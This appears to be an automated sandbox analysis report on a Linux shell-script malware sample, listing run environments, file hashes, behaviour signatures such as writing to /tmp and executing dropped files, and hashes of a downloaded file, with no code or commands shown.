Analysis
-
max time kernel
46s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
28/10/2024, 01:44
Static task
static1
Behavioral task
behavioral1
Sample
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813.sh
-
Size
10KB
-
MD5
c3a67442db56ee6d5718cb9b8748a2a7
-
SHA1
7439efa913e1f900f72ff80e1a271b84fe407877
-
SHA256
19df6cfdcbf47f7d2db1e142b07bfd09db79bd1ade8c6f87ae300b7e07299813
-
SHA512
ee896800093e9a5525f3110d7dbb4a475f534a1c1277c266f4f35ef58d6578e346eff768abda3f17514bbfd1ee925002de937c6bc213a20d18912936e415db73
-
SSDEEP
192:0PXUAsXN4PcoJwIYVV7OyGe4qS5pcoJwIhyGe4qS9QPXUAsXq:0PXUDXN4PcoJwIYVV7OyGBqS5pcoJwIA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97